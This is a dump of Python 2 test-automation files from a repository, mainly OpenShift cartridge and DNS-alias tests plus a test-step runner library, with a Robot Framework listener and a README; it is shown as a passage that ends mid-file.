"length_bytes": 5839, "license_type": "no_license", "max_line_length": 177, "num_lines": 148, "path": "/automation/open/testmodules/RT/client/expose_conceal_port_hooks.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import common\nimport OSConf\nimport rhtest\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.info(\"[US1909][BI]Horizontal Scale: Expose/Conceal port hooks\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n self.key_filename = common.getRandomString(7)\n self.new_keyname = common.getRandomString(7)\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n self.proxy_port = None\n self.proxy_host = None\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass ExposeConcealPortHooks(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\",\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, \n True])\n\n self.add_step(\"Emebed mysql\",\n common.embed,\n function_parameters=[self.app_name, \n 'add-%s'%common.cartridge_types['mysql'], \n self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Run exposed hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"expose-port\", \n \"PROXY_PORT=\\d+\"],\n expect_return=0)\n\n self.add_step(\"Run conceal hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"conceal-port\", \n None, 0],\n expect_return=0)\n\n self.add_step(\"Check MYSQL connection to PROXY_HOST:PROXY_PORT\",\n self.verify_proxy_port,\n function_parameters=[self.app_name],\n expect_description = \"Mysql to proxy should fail\",\n expect_return=\"!0\")\n\n self.add_step(\"Run show hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"show-port\", \n r\"CLIENT_RESULT: No proxy ports defined\", 0],\n expect_return=0)\n\n self.add_step(\"Run exposed hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"expose-port\", \n \"PROXY_PORT=\\d+\"],\n expect_return=0)\n\n self.add_step(\"Run show hook directly from shell\",\n self.verify,\n function_parameters=[self.app_name, \n \"show-port\", \n \"PROXY_PORT=\\d+\"],\n expect_return=0)\n\n self.add_step(\"Check MYSQL connection to PROXY_HOST:PROXY_PORT\",\n self.verify_proxy_port,\n function_parameters=[self.app_name],\n expect_description = \"Mysql to proxy should pass\",\n expect_return=0)\n\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def verify_proxy_port(self, app_name):\n if (self.proxy_host==None or self.proxy_port==None):\n print \"ERROR: Unable to capture PROXY_PORT/PROXY_HOST from rhc ctl app -c show-port output\"\n return 1\n\n cart = OSConf.get_apps()[app_name]['embed'][common.cartridge_types['mysql']]\n cmd=\"echo 'SHOW TABLES' | mysql --host=%s --port=%s --user=%s --password=%s %s \"%(self.proxy_host, self.proxy_port, cart['username'], cart['password'], cart['database'])\n (status, output) = common.run_remote_cmd(app_name, cmd)\n return status\n\n def verify(self, app_name, hook_name, expected_re=None, expected_return=None):\n uuid = OSConf.get_app_uuid(app_name)\n cmd = '''cd /usr/libexec/openshift/cartridges/embedded/%s/info/hooks && ./%s %s %s %s '''%(common.cartridge_types['mysql'], hook_name, app_name, self.domain_name, uuid)\n (status, output) = common.run_remote_cmd(None, cmd, as_root=True)\n #this is stronger condition\n if (expected_re!=None):\n obj = re.search(r\"%s\"%expected_re, output)\n if obj:\n if (hook_name=='expose-port'):\n obj = re.search(r\"PROXY_HOST=(.*)\",output)\n obj2 = re.search(r\"PROXY_PORT=(.*)\",output)\n if (obj and obj2):\n self.proxy_host = obj.group(1)\n self.proxy_port = obj2.group(1)\n else:\n print \"WARNING: Unable to capture PROXY_HOST from output...\"\n return 0\n else:\n return 1\n\n if (expected_return!=None):\n if status==expected_return:\n return 0\n else:\n return 1\n print \"WARNING: Nothing to verify?\"\n return 1\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ExposeConcealPortHooks)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.641791045665741, "alphanum_fraction": 0.6447761058807373, "avg_line_length": 29.454545974731445, "blob_id": "d4f82ffb6dfa594abb0caf4abe4a1d2aaa825e67", "content_id": "2f09df11f645320990789f9adadaa87f6bb58ce6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 87, "num_lines": 11, "path": "/listenertest/ShowVariable.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import tkMessageBox\nfrom Tkinter import Tk\nfrom robot.libraries.BuiltIn import BuiltIn\n \n \nROBOT_LISTENER_API_VERSION = 2\n \ndef end_test(name, attributes):\n Tk().withdraw() # Remove root window\n tkMessageBox.showinfo(\"Please click 'OK'...\",\n \"test_var = '%s'\" % BuiltIn().get_variables()['${test_var}'])\n" }, { "alpha_fraction": 0.5459363460540771, "alphanum_fraction": 0.5486295223236084, "avg_line_length": 39.669612884521484, "blob_id": "22582d22e80322b250d4a3aac66c850d9b142895", "content_id": "f888ff59aa1a6261e5b5ce94c7b2753160d57e76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23021, "license_type": "no_license", "max_line_length": 377, "num_lines": 566, "path": "/automation/open/lib/testcase.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport re\nimport time\nimport sys\nimport inspect\nimport subprocess\nimport os\nimport signal\nfrom helper import TimeoutError, Alarm, _alarm_handler, COMMAND_TIMEOUT, cmd_get_status_output\n# test By default, already have one element to occupy 0 index, so that steps' output will be saved from 1 index\n# Every element in this list should be string.\n__OUTPUT__ = [None]\n__PARSED_VARS__ = {}\n# parameters eval only occurs in TestCase instance, not in TestCaseStep instance\n__EVAL_FLAG__ = False\n\n\ndef repl(matchobj):\n #global __OUTPUT__\n if matchobj != None:\n print '''Found '__OUTPUT__|__PARSED_VARS__' keyword, replace it'''\n return eval(matchobj.group(0))\n\ndef eval_parameters_list(parameters_list):\n #global __OUTPUT__\n print '''Eval parameters of string type...'''\n temp = []\n for parameter in parameters_list:\n if isinstance(parameter, str):\n re_match_obj = re.match(r\"^__OUTPUT__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", repl, parameter)\n #__PARSED_VARS__\n re_match_obj = re.match(r\"^__PARSED_VARS__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", repl, parameter)\n else:\n pass\n temp.append(parameter)\n return temp\n\n\ndef run_function(function_name, parameters_list):\n #global __OUTPUT__\n print \"\\nFunction is running ...\"\n #apply is deprecated since version 2.3, http://docs.python.org/library/functions.html#apply\n #retcode = apply(self.cmd, self.parameters)\n retcode = function_name(*parameters_list)\n print \"\\nFunction Return:\", retcode\n # Function's output will not be captured, so set it to \"Fun_None_Output\"\n return (retcode, \"Fun_None_Output\")\n\n\ndef eval_command_string(command_line):\n print '''Evaluting command string...'''\n cmd_after_eval = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", repl, command_line)\n cmd_after_eval = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", repl, cmd_after_eval)\n return cmd_after_eval\n\n\n\ndef run_command(command):\n return cmd_get_status_output(command)\n\n\ndef check_ret(real_ret, expect_ret):\n if not isinstance(real_ret, list) and isinstance(expect_ret, str) and re.match(\"^!\",expect_ret):\n real_expect_ret = int(expect_ret.replace('!',''))\n if real_ret != real_expect_ret:\n print \"Return %s, Expect %s - [PASS]\" %(real_ret, expect_ret)\n return True\n else:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret, expect_ret)\n return False\n elif (isinstance(real_ret, list) or isinstance(real_ret, tuple)) and not (isinstance(expect_ret, tuple) or isinstance(expect_ret, list)): \n #case when the list is returned from function...\n #will check only the first item in the list\n if len(real_ret)>0 and real_ret[0] == expect_ret:\n print \"Return %s, Expect %s - [PASS]\" %(real_ret[0], expect_ret)\n return True\n else:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret[0], expect_ret)\n return False\n elif (isinstance(real_ret, list) or isinstance(real_ret, tuple)) and (isinstance(expect_ret, list) or isinstance(expect_ret, tuple)):\n #case when the list is returned from function\n #also expected value is list\n if len(real_ret) != len(expect_ret):\n return False\n\n for i in real_ret:\n if real_ret[i] != expect_ret[i]:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret[i], expect_ret[i])\n return False\n print \"Return %s, Expect %s - [PASS]\" %(real_ret, expect_ret)\n return True\n elif real_ret == expect_ret:\n print \"Return %s, Expect %s - [PASS]\" %(real_ret, expect_ret)\n return True\n else:\n print \"Return %s, Expect %s - [FAIL]\" %(real_ret, expect_ret)\n return False\n\n\ndef check_output(output, expect_str_reg_list, ex_re_ignore_case, unexpect_str_reg_list, unex_re_ignore_case):\n if ex_re_ignore_case:\n print \"re.I flag is trun on for expect string matching\"\n ex_re_flag = re.M | re.I\n else:\n ex_re_flag = re.M\n for reg in expect_str_reg_list:\n search_obj = re.search(r'''%s'''%(reg), output, ex_re_flag)\n if search_obj != None:\n print \"According to [%s] regular express, find out expected string: [%s] - [PASS]\" %(reg, search_obj.group(0))\n else:\n print \"According to [%s] regular express, no expected string is found out - [FAIL]\" %(reg)\n return False\n\n if unex_re_ignore_case:\n print \"re.I flag is trun on for unexpect string matching\"\n unex_re_flag = re.M | re.I\n else:\n unex_re_flag = re.M\n for reg in unexpect_str_reg_list:\n search_obj = re.search(r'''%s'''%(reg), output, unex_re_flag)\n if search_obj != None:\n print \"According to [%s] regular express, find out unexpected string: [%s] - [FAIL]\" %(reg, search_obj.group(0))\n return False\n else:\n print \"According to [%s] regular express, no unexpected string is found out - [PASS]\" %(reg)\n\n return True\n\n\ndef filter_output(output, filter_reg):\n if filter_reg != None:\n search_obj = re.search(r\"%s\" %(filter_reg), output, re.M)\n if search_obj != None:\n ret_output = search_obj.group(0)\n print \"According to output filter - [%s], return [%s]\" %(filter_reg, ret_output)\n else:\n ret_output = \"\"\n print \"According to output filter - [%s], return empty string\" %(filter_reg)\n else:\n ret_output = output\n return ret_output\n\n\ndef run(command, function_parameters):\n if isinstance(command, str):\n print '''Command: %s''' %(command)\n if __EVAL_FLAG__:\n command = eval_command_string(command)\n print '''Command after evalute: %s\\n''' %(command)\n (retcode, output) = run_command(command)\n elif inspect.isfunction(command):\n print '''Function: %s''' %(command)\n print '''Parameters: %s''' %(function_parameters)\n\n #\n # let's try to exec functions/closeures if present\n #\n l_params = []\n for p in function_parameters:\n if inspect.isfunction(p) or inspect.ismethod(p):\n print '''INFO: Execute %s parameter as function'''%p\n res = p()\n l_params.append(res)\n else:\n l_params.append(p)\n\n function_parameters = l_params\n print '''Parameters: %s''' %(function_parameters)\n if __EVAL_FLAG__:\n function_parameters = eval_parameters_list(function_parameters)\n print '''Parameters after evalute: %s\\n''' %(function_parameters)\n (retcode, output) = run_function(command, function_parameters)\n else:\n print \"Unknow command type !!!\"\n return 254\n\n return (retcode, output)\n\n\n\n\nclass TestCase():\n\n def __init__(self, summary, steps=[], clean_up_command=None, clean_up_function_parameters=[], testcase_id=None):\n if not isinstance(steps, list):\n print \"Parameter Error: list type is expected for steps option, e.g: [{'description': <value>, 'command': <value>}, TestCaseStep_Object]\"\n sys.exit(99)\n if not isinstance(summary, str):\n print \"Parameter Error: str type is expected for summary option\"\n sys.exit(99)\n\n self.summary = summary\n self.TestCaseStep_Obj_list = []\n self.count = 0\n self.Step_Output_List = []\n self.__clean_up_cmd = clean_up_command\n self.__clean_up_fun_parameters = clean_up_function_parameters\n self.testcase_status= 'IDLE' #default state... (we need this for backward compatibility)\n\n for step in steps:\n self.count = self.count + 1\n if isinstance(step, dict):\n step_parameters_list = []\n step_parameters_list.append(step['Description'])\n step_parameters_list.append(step['Command'])\n if step.has_key('Function_Parameters'):\n step_parameters_list.append(step['Function_Parameters'])\n else:\n step_parameters_list.append([])\n if step.has_key('Expect_Description'):\n step_parameters_list.append(step['Expect_Description'])\n else:\n step_parameters_list.append(\"\")\n if step.has_key('Expect_Return'):\n step_parameters_list.append(step['Expect_Return'])\n else:\n step_parameters_list.append(None)\n if step.has_key('Expect_String_List'):\n step_parameters_list.append(step['Expect_String_List'])\n else:\n step_parameters_list.append([])\n if step.has_key('Expect_Str_Re_IgnoreCase'):\n step_parameters_list.append(step['Expect_Str_Re_IgnoreCase'])\n else:\n step_parameters_list.append(False)\n if step.has_key('Unexpect_String_List'):\n step_parameters_list.append(step['Unexpect_String_List'])\n else:\n step_parameters_list.append([])\n if step.has_key('Unexpect_Str_Re_IgnoreCase'):\n step_parameters_list.append(step['Unexpect_Str_Re_IgnoreCase'])\n else:\n step_parameters_list.append(False)\n if step.has_key('Output_Filter'):\n step_parameters_list.append(step['Output_Filter'])\n else:\n step_parameters_list.append(None)\n step_parameters_list.append(self.count)\n if step.has_key('Try_Count'):\n step_parameters_list.append(step['Try_Count'])\n else:\n step_parameters_list.append(1)\n if step.has_key('Try_Interval'):\n step_parameters_list.append(step['Try_Interval'])\n else:\n step_parameters_list.append(5)\n if step.has_key('Clean_Up_Command'):\n step_parameters_list.append(step['Clean_Up_Command'])\n else:\n step_parameters_list.append(None)\n if step.has_key('Clean_Up_Function_Parameters'):\n step_parameters_list.append(step['Clean_Up_Function_Parameters'])\n else:\n step_parameters_list.append([])\n TestCaseStep_Obj = TestCaseStep(*step_parameters_list)\n self.TestCaseStep_Obj_list.append(TestCaseStep_Obj)\n elif isinstance(step, TestCaseStep):\n step.step_id = self.count\n self.TestCaseStep_Obj_list.append(step)\n else:\n print \"Parameter error: nethier dict type nor TestCaseStep Object\"\n sys.exit(99)\n\n\n def run(self):\n \"\"\"\n TestCase.run()\n \"\"\"\n # init __OUTPUT__ list and __EVAL_FLAG__ at the begin of test case\n global __OUTPUT__\n global __PARSED_VARS__\n global __EVAL_FLAG__\n __OUTPUT__ = [None]\n __PARSED_VARS__ = {}\n __EVAL_FLAG__ = True\n print \"=\"*80\n print self.summary\n print \"=\"*80\n # Start run every step\n try:\n fail_detected = None\n for step_obj in self.TestCaseStep_Obj_list:\n (step_ret, step_output) = step_obj.run()\n if step_output == \"Fun_None_Output\":\n __OUTPUT__.append(step_ret)\n #if isinstance(step_ret, str):\n # __OUTPUT__.append(step_ret)\n #else:\n # print \"WARNING!!!\\nThe return value of function is not string type, so empty string will be saved into __OUTPUT__ list\"\n # __OUTPUT__.append(\"\")\n else:\n __OUTPUT__.append(step_output)\n #print \"\\n----> Current __OUTPUT__:\", __OUTPUT__, \"\\n\"\n #TODO: check this assumption: I case of failure --> Exception otherwise PASS\n self.testcase_status = 'PASSED'\n except TestCaseStepFail as fail:\n self.testcase_status = 'FAILED'\n raise fail\n except Exception as e:\n self.testcase_status = 'ERROR'\n raise e\n finally:\n if self.__clean_up_cmd != None:\n self.clean_up()\n\n # clean up __OUTPUT__ list and __EVAL_FLAG__ list at the end of test case\n __OUTPUT__ = [None]\n __PARSED_VARS__= {}\n __EVAL_FLAG__ = False\n\n\n def add_clean_up(self, command, function_parameters=[]):\n self.__clean_up_cmd = command\n if len(function_parameters) != 0:\n self.__clean_up_fun_parameters = function_parameters\n\n\n def clean_up(self):\n print \"~\"*50\n print \"Test Case Clean Up ...\"\n print \"~\"*50\n run(self.__clean_up_cmd, self.__clean_up_fun_parameters)\n\n\nclass TestCaseStep():\n def __init__(self, description, command, function_parameters=[], expect_description=\"\", expect_return=None, expect_string_list=[], ex_re_ignore_case=False, unexpect_string_list=[], unex_re_ignore_case=False, output_filter=None, step_id=None, try_count=1, try_interval=5, clean_up_command=None, clean_up_function_parameters=[], output_callback=None, string_parameters=None):\n self.desc = description\n self.cmd = command\n self.parameters = function_parameters\n self.string_parameters = string_parameters\n self.expect_desc = expect_description\n self.expect_ret = expect_return\n self.expect_str_list = expect_string_list\n self.ex_re_ignore_case = ex_re_ignore_case\n self.unexpect_str_list = unexpect_string_list\n self.unex_re_ignore_case = unex_re_ignore_case\n self.output_filter = output_filter\n self.step_id = step_id\n self.try_count = try_count\n self.try_interval = try_interval\n self.__clean_up_cmd = clean_up_command\n self.__clean_up_fun_parameters = clean_up_function_parameters\n self.__output_callback = output_callback\n\n if self.expect_ret != None:\n self.check_ret_enable = True\n else:\n self.check_ret_enable = False\n\n if len(self.expect_str_list) != 0 or len(self.unexpect_str_list) != 0:\n self.check_output_enable = True\n else:\n self.check_output_enable = False\n\n\n def add_clean_up(self, command, function_parameters=[]):\n self.__clean_up_cmd = command\n if len(function_parameters) != 0:\n self.__clean_up_fun_parameters = function_parameters\n\n\n def clean_up(self):\n print \"~\"*50\n print \"Test Case Step Clean Up ...\"\n print \"~\"*50\n run(self.__clean_up_cmd, self.__clean_up_fun_parameters)\n\n\n def __check_command_result(self, result, expect_ret, expect_str_list, ex_re_ignore_case, unexpect_str_list, unex_re_ignore_case):\n (retcode, output) = result\n\n if self.check_ret_enable == False and self.check_output_enable == False:\n print \"No check!!!!\"\n return None\n\n if self.check_ret_enable == True:\n print \"Checking return value ...\"\n if check_ret(retcode, expect_ret):\n self.check_ret_enable = False\n else:\n return None\n\n if self.check_output_enable == True:\n print \"Checking output string ...\"\n if check_output(output, expect_str_list, ex_re_ignore_case, unexpect_str_list, unex_re_ignore_case):\n self.check_output_enable = False\n else:\n return None\n\n\n def __check_function_result(self, result, expect_ret):\n (retcode, output) = result\n\n if self.check_ret_enable == True:\n print \"Checking return value...\"\n if check_ret(retcode, expect_ret):\n self.check_ret_enable = False\n else:\n return None\n else:\n print \"No check!!!!\"\n\n\n def run(self):\n \"\"\"\n TestCaseStep.run()\n \"\"\"\n global __EVAL_FLAG__\n global __PARSED_VARS__\n #global __OUTPUT__\n\n print \"-\"*80\n if self.step_id is not None:\n print \"Step %s:\" %(self.step_id)\n print \"Description: %s\" %(self.desc)\n if isinstance(self.expect_desc, str):\n print \"Expect Result: %s\" %(self.expect_desc)\n print \"-\"*80\n\n if isinstance(self.cmd, str) or isinstance(self.cmd, unicode):\n if (isinstance(self.cmd, unicode)):\n print \"Warning: UNICODE format of command.\"\n print '''Command: %s''' %(self.cmd)\n if self.string_parameters:\n l_params = [] #for expansion\n for p in self.string_parameters:\n if inspect.isfunction(p):\n l_params.append(p())\n else:\n l_params.append(p)\n try:\n #make a quoted string\n #TODO: check what kind of quotes have been used and based on that make fixes\n l_params = \",\".join(map(lambda x: '\"'+x+'\"', l_params))\n print \"DEBUG:\", l_params\n str2exec = 'self.cmd=self.cmd%%(%s)'%l_params\n print \"DEBUG:\", str2exec\n #and do the expansion...\n exec(str2exec)\n except Exception as e:\n print \"WARN: Unable to expand command.\",e\n\n print '''Command after expansion: %s\\n''' %(self.cmd)\n\n if __EVAL_FLAG__:\n self.cmd = eval_command_string(self.cmd)\n print '''Command after evalute: %s\\n''' %(self.cmd)\n\n (retcode, output) = run_command(self.cmd)\n\n #\n #handling of output_callback function\n #\n if self.__output_callback and (inspect.isfunction(self.__output_callback) or inspect.ismethod(self.__output_callback)):\n print \"DEBUG: Calling callback...\",self.__output_callback\n try:\n __PARSED_VARS__ = self.__output_callback(output)\n if not isinstance(__PARSED_VARS__, dict):\n print \"WARN: Wrong return value of callback. Should be dict()\"\n print \"DEBUG: Callback Done.\", __PARSED_VARS__\n except Exception as e:\n print \"CALLBACK ERROR: \",e\n\n\n self.__check_command_result((retcode, output), self.expect_ret, self.expect_str_list, self.ex_re_ignore_case, self.unexpect_str_list, self.unex_re_ignore_case)\n # If check failed, will try again\n for num in range(1, self.try_count):\n if self.check_ret_enable == True or self.check_output_enable == True:\n print \"\\nSleep %s seconds, after that, will try again ...\\n\" %(self.try_interval)\n time.sleep(self.try_interval)\n (retcode, output) = run_command(self.cmd)\n self.__check_command_result((retcode, output), self.expect_ret, self.expect_str_list, self.ex_re_ignore_case, self.unexpect_str_list, self.unex_re_ignore_case)\n else:\n break\n\n if self.__clean_up_cmd != None:\n self.clean_up()\n\n if self.check_ret_enable == False and self.check_output_enable == False:\n output = filter_output(output, self.output_filter)\n return (retcode, output)\n else:\n raise TestCaseStepFail('Check Failed !!! @shell %s'%self.cmd)\n\n elif inspect.isfunction(self.cmd) or inspect.ismethod(self.cmd):\n print '''Function: %s''' %(self.cmd)\n print '''Parameters: %s''' %(self.parameters)\n\n\n #\n # let's try to exec functions/closeures if present\n #\n l_params = []\n for p in self.parameters:\n if inspect.isfunction(p) or inspect.ismethod(p):\n print '''INFO: Execute %s parameter as function '''%p\n res = p()\n l_params.append(res)\n else:\n l_params.append(p)\n\n if __EVAL_FLAG__:\n l_params = eval_parameters_list(l_params)\n print '''Parameters after evalute: %s\\n''' %(l_params)\n\n print '''Parameters: %s''' %(l_params)\n self.parameters = l_params\n (retcode, output) = run_function(self.cmd, l_params)\n\n #\n #handling of output_callback function\n #\n if self.__output_callback and (inspect.isfunction(self.__output_callback) or inspect.ismethod(self.__output_callback)):\n print \"DEBUG: Calling callback...\",self.__output_callback\n try:\n __PARSED_VARS__ = self.__output_callback(output)\n print \"DEBUG: Callback Done.\", __PARSED_VARS__\n except Exception as e:\n print \"ERROR: \",e\n\n self.__check_function_result((retcode, output), self.expect_ret)\n # If check failed, will try again\n for num in range(1, self.try_count):\n if self.check_ret_enable == True:\n print \"\\nSleep %s seconds, after that, will try again ...\\n\" %(self.try_interval)\n time.sleep(self.try_interval)\n (retcode, output) = run_function(self.cmd, self.parameters)\n self.__check_function_result((retcode, output), self.expect_ret)\n else:\n break\n\n if self.__clean_up_cmd != None:\n self.clean_up()\n\n if self.check_ret_enable == False:\n return (retcode, output)\n else:\n raise TestCaseStepFail('Check Failed !!! @function %s)'%self.cmd)\n\n else:\n raise Exception(\"Unknow Command Type !!!\")\n\n def add_output_callback(self, command, function_parameters=[]):\n \"\"\"\n Callback has to return dict type e.g.{'uuid':'329347239',...} for later processing. Any additional step then can use: __PARSED_VARS__['uuid'] to access it\n \"\"\"\n self.__output_callback = command\n #TODO: do implement\n if len(function_parameters) != 0:\n self.__output_callback_param = function_parameters\n \n\n\nclass TestCaseStepFail(Exception):\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return repr(self.msg)\n\n\n" }, { "alpha_fraction": 0.6150662302970886, "alphanum_fraction": 0.625, "avg_line_length": 21.370370864868164, "blob_id": "d64bdb1b03dfebd143bb3abeeb08b140bed72b8a", "content_id": "b4c8ec228c785737907ff02f0e5af442869951ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 78, "num_lines": 54, "path": "/automation/open/boilerplate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\n#### test specific import\nimport random\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n ### put test specific initialization steps here\n pass\n\n def record_results(self, resid):\n # put testcase specific storing data to specific tables here.\n pass\n\n def finalize(self):\n ### put test specific steps \n pass\n \n\nclass Demo01(OpenShiftTest):\n def test_method(self):\n \"\"\"\n This is a very simple test...but the pattern is the same, the \n\n \"\"\"\n errorCount = ((random.randint(1, 3) % 2) == 0)\n\n\n # this will trigger not only print to the console, but also stroed the\n # test run information as PASSED/FAILED/ABORTED\n if errorCount:\n return self.failed(\"Demo01 test failed.\")\n else:\n return self.passed(\"Demo01 test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7410072088241577, "alphanum_fraction": 0.7410072088241577, "avg_line_length": 22.16666603088379, "blob_id": "23bdb5dfa330ab74b05fcb9e8e8f0889ca901ac2", "content_id": "b6d6fceaf95f60e64575178e2a93f3dc3f4483c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/simpletodo/sites/forms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from django import forms\n\n\nclass TodoForm(forms.Form):\n todo = forms.CharField(widget=forms.Textarea)\n priority = forms.RadioInput()\n" }, { "alpha_fraction": 0.7676056623458862, "alphanum_fraction": 0.7676056623458862, "avg_line_length": 39.57143020629883, "blob_id": "a4fdfd78e42000d165e92003ffbd05fe5635147f", "content_id": "f1c706d0ea1dba39c1ff8d0916378c71dee92ad6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 568, "license_type": "no_license", "max_line_length": 74, "num_lines": 14, "path": "/automation/debuglistener/RobotDemo/README.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Robot Framework Demo\n====================\n\n`Robot Framework`__ is a generic open source test automation framework.\nThis demo introduces the basic Robot Framework test data syntax, how tests\nare executed, how generated logs and reports look like, and how to create\ncustom test libraries.\n\nSee `project wiki`__ for more information about running the demo, viewing\nresults, etc. You can also view the tests and generated results through\nthe wiki without running the demo yourself.\n\n__ http://robotframework.org\n__ https://bitbucket.org/robotframework/robotdemo/wiki/Home\n" }, { "alpha_fraction": 0.5671814680099487, "alphanum_fraction": 0.577606201171875, "avg_line_length": 45.244049072265625, "blob_id": "f20190e2c0f885fbf1bd00db238b4c7387007149", "content_id": "66457566d0271b7240d29e8dba8655f136b1acbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7770, "license_type": "no_license", "max_line_length": 157, "num_lines": 168, "path": "/automation/open/testmodules/RT/node/add_alias_for_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1277][rhc-cartridge]Custom DNS names\nhttps://tcms.engineering.redhat.com/case/122390/\n\"\"\"\nimport os,sys,re,time\n\nimport rhtest\n#import database\nimport random\n# user defined packages\nimport openshift\nimport testcase,common,OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US1277][rhc-cartridge]Custom DNS names\"\n self.domain_name = common.get_domain_name()\n if len(self.domain_name)==0:\n raise Exception(\"Empty domain name\")\n\n self.new_domain_name = common.getRandomString(10)\n self.app_name = \"phpdns\"\n self.app_type = common.app_types['php']\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n tcms_testcase_id = 122389, 122390, 122391\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s* \"%(self.app_name))\n\nclass CustomDnsNames(OpenShiftTest):\n\n def get_app_ip(self):\n app_url = OSConf.get_app_url(self.app_name)\n (status, output) = common.command_getstatusoutput(\"ping -c 3 %s\"%app_url)\n\n obj = re.search(r\"(?<=\\()(\\d{1,3}.){3}\\d{1,3}(?=\\))\", output)\n if obj:\n app_ip = obj.group(0)\n print \"Got ip: %s\" %(app_ip)\n return app_ip\n else:\n raise Exception(\"ERROR Unable to get IP address of app\")\n\n\n def test_method(self):\n\n # Create an php app\n self.steps_list.append(testcase.TestCaseStep(\"Create an php app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # Get the ip address of the app\n self.steps_list.append(testcase.TestCaseStep(\"Get the ip address of the app\",\n self.get_app_ip,\n expect_description=\"app's ip address should be got\"))\n\n aliases = [\"%s.bar.com\" %(common.getRandomString(3)),\"%s.bar.com\" %(common.getRandomString(3))]\n\n for alias in aliases:\n # Add an alias to the app\n self.steps_list.append(testcase.TestCaseStep(\"Add an alias to the app\",\n \"rhc alias add %s %s -l %s -p '%s' %s\"\n % (self.app_name, alias, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"alias: %s should be added\" % (alias),\n expect_return=0))\n\n # Try to add the same alias to the app\n self.steps_list.append(testcase.TestCaseStep(\"Add the same alias again to the app\",\n \"rhc alias add %s %s -l %s -p '%s' %s\"\n % (self.app_name, alias, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"alias: %s should be added\" % (alias),\n expect_return=\"!0\"))\n\n # Make some changes in the git repo and git push \n test_html = \"Welcome to %s test page\" % (alias)\n self.steps_list.append(testcase.TestCaseStep(\n \"Make some changes in the git repo and git push\",\n \"cd %s && echo '%s' > php/index.php && git commit -am t && git push\" % (self.git_repo, test_html),\n expect_description=\"Successfully changed git repo and git push\",\n expect_return=0))\n\n # sleep to wait it takes effect\n self.steps_list.append(testcase.TestCaseStep(\"Waiting.. 5 seconds\",\n common.sleep,\n function_parameters=[5]))\n\n # Access the app using custom DNS to see if changes have taken effect\n self.steps_list.append(testcase.TestCaseStep(\n \"Access the app using custom DNS to see if changes have taken effect\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (alias, test_html),\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n # Remove one of the aliases\n 